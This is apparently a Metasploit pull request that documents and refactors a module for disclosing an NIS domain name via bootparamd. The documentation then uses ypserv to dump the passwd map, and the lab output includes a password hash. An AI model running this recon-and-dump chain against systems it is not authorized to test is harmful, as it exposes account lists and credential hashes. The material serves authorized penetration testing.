### PR TITLE
Add NIS bootparamd domain name disclosure

### DIFF
--- a/documentation/modules/auxiliary/gather/nis_bootparamd_domain.md
+++ b/documentation/modules/auxiliary/gather/nis_bootparamd_domain.md
@@ -7,7 +7,7 @@ From the `bootparamd(8)` man page:
 The module documented within will allow a tester to disclose the NIS
 domain name from a server running `bootparamd`. After knowing the domain
 name, the tester can follow up with `auxiliary/gather/nis_ypserv_map` to
-dump a map from an NIS server (running as `ypserv`).
+dump a map from a compatible NIS server (running as `ypserv`).
 
 ## Setup
 
@@ -62,7 +62,8 @@ msf auxiliary(gather/nis_bootparamd_domain) >
 ```
 
 After disclosing the domain name, you can use
-`auxiliary/gather/nis_ypserv_map` to dump a map from an NIS server.
+`auxiliary/gather/nis_ypserv_map` to dump a map from a compatible NIS
+server.
 
 ```
 msf auxiliary(gather/nis_bootparamd_domain) > use auxiliary/gather/nis_ypserv_map

--- a/documentation/modules/auxiliary/gather/nis_bootparamd_domain.md
+++ b/documentation/modules/auxiliary/gather/nis_bootparamd_domain.md
@@ -1,0 +1,98 @@
+## Intro
+
+From the `bootparamd(8)` man page:
+
+> bootparamd is a server process that provides information to diskless clients necessary for booting. It consults the /etc/bootparams file to find the information it needs.
+
+The module documented within will allow a tester to disclose the NIS
+domain name from a server running `bootparamd`. After knowing the domain
+name, the tester can follow up with `auxiliary/gather/nis_ypserv_map` to
+dump a map from an NIS server (running as `ypserv`).
+
+## Setup
+
+Set up NIS as per <https://help.ubuntu.com/community/SettingUpNISHowTo>.
+If the link is down, you can find it via the Wayback Machine.
+
+After that is done, install `bootparamd` however your OS provides it.
+
+Make sure you add a client to the `bootparams` file, which is usually at
+`/etc/bootparams`. The client should be added to `/etc/hosts` if it
+isn't already resolvable.
+
+## Options
+
+**PROTOCOL**
+
+Set this to either TCP or UDP. UDP is the default due to `bootparamd`.
+
+**CLIENT**
+
+Set this to the address of a client in the target's `bootparams` file.
+Usually this is a host within the same network range as the target.
+
+**XDRTimeout**
+
+Set this to the timeout in seconds for XDR decoding of the response.
+
+## Usage
+
+```
+msf > use auxiliary/gather/nis_bootparamd_domain
+msf auxiliary(gather/nis_bootparamd_domain) > set rhost 192.168.33.10
+rhost => 192.168.33.10
+msf auxiliary(gather/nis_bootparamd_domain) > set client 192.168.33.10
+client => 192.168.33.10
+msf auxiliary(gather/nis_bootparamd_domain) > run
+
+[+] 192.168.33.10:111 - NIS domain name for host ubuntu-xenial (192.168.33.10) is gesellschaft
+[*] Auxiliary module execution completed
+msf auxiliary(gather/nis_bootparamd_domain) >
+```
+
+After disclosing the domain name, you can use
+`auxiliary/gather/nis_ypserv_map` to dump a map from an NIS server.
+
+```
+msf auxiliary(gather/nis_bootparamd_domain) > use auxiliary/gather/nis_ypserv_map
+msf auxiliary(gather/nis_ypserv_map) > set rhost 192.168.33.10
+rhost => 192.168.33.10
+msf auxiliary(gather/nis_ypserv_map) > set domain gesellschaft
+domain => gesellschaft
+msf auxiliary(gather/nis_ypserv_map) > run
+
+[+] 192.168.33.10:111 - Dumping map passwd.byname on domain gesellschaft:
+list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ubuntu:$6$LXFAVGTO$yiCXi1KjLynOrapuhJE7tKnvdwknDMKiKM7Z8ZB19ht6CHmsS.CbUTm8q0cy5fFHEqA.Sg4Acl.0UtY.Y0JNE1:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+games:*:5:60:games:/usr/games:/usr/sbin/nologin
+news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
+lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+sys:*:3:3:sys:/dev:/usr/sbin/nologin
+backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
+uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
+bin:*:2:2:bin:/bin:/usr/sbin/nologin
+gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+sync:*:4:65534:sync:/bin:/bin/sync
+systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+uuidd:*:108:112::/run/uuidd:/bin/false
+dnsmasq:*:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
+root:*:0:0:root:/root:/bin/bash
+sshd:*:110:65534::/var/run/sshd:/usr/sbin/nologin
+systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+messagebus:*:107:111::/var/run/dbus:/bin/false
+_apt:*:105:65534::/nonexistent:/bin/false
+mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
+syslog:*:104:108::/home/syslog:/bin/false
+daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+pollinate:*:111:1::/var/cache/pollinate:/bin/false
+www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
+proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
+lxd:*:106:65534::/var/lib/lxd/:/bin/false
+
+[*] Auxiliary module execution completed
+msf auxiliary(gather/nis_ypserv_map) >
+```

--- a/documentation/modules/auxiliary/gather/nis_bootparamd_domain.md
+++ b/documentation/modules/auxiliary/gather/nis_bootparamd_domain.md
@@ -17,8 +17,19 @@ If the link is down, you can find it via the Wayback Machine.
 After that is done, install `bootparamd` however your OS provides it.
 
 Make sure you add a client to the `bootparams` file, which is usually at
-`/etc/bootparams`. The client should be added to `/etc/hosts` if it
-isn't already resolvable.
+`/etc/bootparams`.
+
+Here is an example `bootparams` file (courtesy of
+[@bcoles](https://github.com/bcoles)):
+
+```
+clientname root=nfsserver:/export/clientname/root
+```
+
+You can read the `bootparams(5)` man page for more info.
+
+Lastly, the client should be added to `/etc/hosts` if it isn't already
+resolvable.
 
 ## Options
 

--- a/lib/rex/proto/sunrpc/client.rb
+++ b/lib/rex/proto/sunrpc/client.rb
@@ -179,7 +179,8 @@ class Client
     buf = nil
     begin
       Timeout.timeout(maxwait) { buf = sock.get }
-    rescue ::Timeout
+    rescue Timeout::Error
+      raise RPCTimeout
     end
 
     return nil if not buf

--- a/modules/auxiliary/gather/nis_bootparamd_domain.rb
+++ b/modules/auxiliary/gather/nis_bootparamd_domain.rb
@@ -133,11 +133,9 @@ class MetasploitModule < Msf::Auxiliary
           Integer  # Router Address: [redacted]
         )
 
-        if host && domain
-          bootparams[host] = domain
-        else
-          break
-        end
+        break unless host && domain
+
+        bootparams[host] = domain
       rescue Rex::ArgumentError
         vprint_status("Finished XDR decoding at #{res.inspect}")
         break

--- a/modules/auxiliary/gather/nis_bootparamd_domain.rb
+++ b/modules/auxiliary/gather/nis_bootparamd_domain.rb
@@ -78,9 +78,7 @@ class MetasploitModule < Msf::Auxiliary
     rescue Rex::Proto::SunRPC::RPCError
       print_error('Could not call bootparamd procedure')
       return
-    # XXX:  This bubbles up from Rex::Proto::SunRPC::Client
-    # TODO: Make it raise Rex::Proto::SunRPC::RPCTimeout
-    rescue Timeout::Error
+    rescue Rex::Proto::SunRPC::RPCTimeout
       print_error('Could not disclose NIS domain name (try another CLIENT?)')
       return
     ensure

--- a/modules/auxiliary/gather/nis_bootparamd_domain.rb
+++ b/modules/auxiliary/gather/nis_bootparamd_domain.rb
@@ -133,7 +133,11 @@ class MetasploitModule < Msf::Auxiliary
           Integer  # Router Address: [redacted]
         )
 
-        host && domain ? bootparams[host] = domain : break
+        if host && domain
+          bootparams[host] = domain
+        else
+          break
+        end
       rescue Rex::ArgumentError
         vprint_status("Finished XDR decoding at #{res.inspect}")
         break

--- a/modules/auxiliary/gather/nis_ypserv_map.rb
+++ b/modules/auxiliary/gather/nis_ypserv_map.rb
@@ -136,11 +136,9 @@ class MetasploitModule < Msf::Auxiliary
           String   # Key: [redacted]
         )
 
-        if status == 1 && key && value
-          map[key] = value
-        else
-          break
-        end
+        break unless status == 1 && key && value
+
+        map[key] = value
       rescue Rex::ArgumentError
         vprint_status("Finished XDR decoding at #{res.inspect}")
         break

--- a/modules/auxiliary/gather/nis_ypserv_map.rb
+++ b/modules/auxiliary/gather/nis_ypserv_map.rb
@@ -58,11 +58,9 @@ class MetasploitModule < Msf::Auxiliary
         2       # Program Version: 2
       )
     rescue Rex::ConnectionError
-      print_error('Could not connect to portmapper')
-      return
+      fail_with(Failure::Unreachable, 'Could not connect to portmapper')
     rescue Rex::Proto::SunRPC::RPCError
-      print_error('Could not connect to ypserv')
-      return
+      fail_with(Failure::Unreachable, 'Could not connect to ypserv')
     end
 
     # Flavor: AUTH_NULL (0)
@@ -80,15 +78,14 @@ class MetasploitModule < Msf::Auxiliary
         ypserv_all_call # Yellow Pages Service ALL call
       )
     rescue Rex::Proto::SunRPC::RPCError
-      print_error('Could not call ypserv procedure')
-      return
+      fail_with(Failure::NotFound, 'Could not call ypserv procedure')
     ensure
       # Shut it down! Shut it down forever!
       sunrpc_destroy
     end
 
-    if res.nil? || res.length < 8
-      print_error('Invalid response from server')
+    unless res && res.length > 8
+      fail_with(Failure::UnexpectedReply, 'Invalid response from server')
       return
     end
 
@@ -96,12 +93,10 @@ class MetasploitModule < Msf::Auxiliary
     case res[4, 4].unpack('l>').first
     # Status: YP_NOMAP (-1)
     when -1
-      print_error("Invalid map #{map_name} specified")
-      return
+      fail_with(Failure::BadConfig, "Invalid map #{map_name} specified")
     # Status: YP_NODOM (-2)
     when -2
-      print_error("Invalid domain #{domain} specified")
-      return
+      fail_with(Failure::BadConfig, "Invalid domain #{domain} specified")
     end
 
     map = begin
@@ -109,12 +104,13 @@ class MetasploitModule < Msf::Auxiliary
         parse_map(res)
       end
     rescue Timeout::Error
-      print_error('XDR decoding timed out (try increasing XDRTimeout?)')
+      fail_with(Failure::TimeoutExpired,
+                'XDR decoding timed out (try increasing XDRTimeout?)')
       return
     end
 
-    if map.nil? || map.empty?
-      print_error("Could not parse map #{map_name}")
+    if map.blank?
+      fail_with(Failure::Unknown, "Could not parse map #{map_name}")
       return
     end
 
@@ -140,7 +136,11 @@ class MetasploitModule < Msf::Auxiliary
           String   # Key: [redacted]
         )
 
-        status == 1 ? map[key] = value : break
+        if status == 1 && key && value
+          map[key] = value
+        else
+          break
+        end
       rescue Rex::ArgumentError
         vprint_status("Finished XDR decoding at #{res.inspect}")
         break


### PR DESCRIPTION
- [x] Set up NIS as per #9368
- [x] Install `bootparamd` however your OS provides it
- [x] Add a client to the `bootparams` file, which is usually at `/etc/bootparams`
- [x] Add the client to `/etc/hosts` if it isn't already resolvable
- [x] `use auxiliary/gather/nis_bootparamd_domain`
- [x] `set rhost` to the server running `bootparamd`
- [x] `set client` to the address of the client you added to `bootparams` earlier
- [x] `run`
- [x] See the NIS domain name printed to screen
- [x] See the NIS domain name stored as a note

```
msf auxiliary(gather/nis_bootparamd_domain) > run

[+] 192.168.33.10:111 - NIS domain name for host ubuntu-xenial (192.168.33.10) is gesellschaft
[*] Auxiliary module execution completed
msf auxiliary(gather/nis_bootparamd_domain) > notes
[*] Time: 2018-01-12 23:52:50 UTC Note: host=192.168.33.10 port=111 protocol=udp type=nis.bootparamd.domain data="NIS domain name for host ubuntu-xenial (192.168.33.10) is gesellschaft"
msf auxiliary(gather/nis_bootparamd_domain) >
```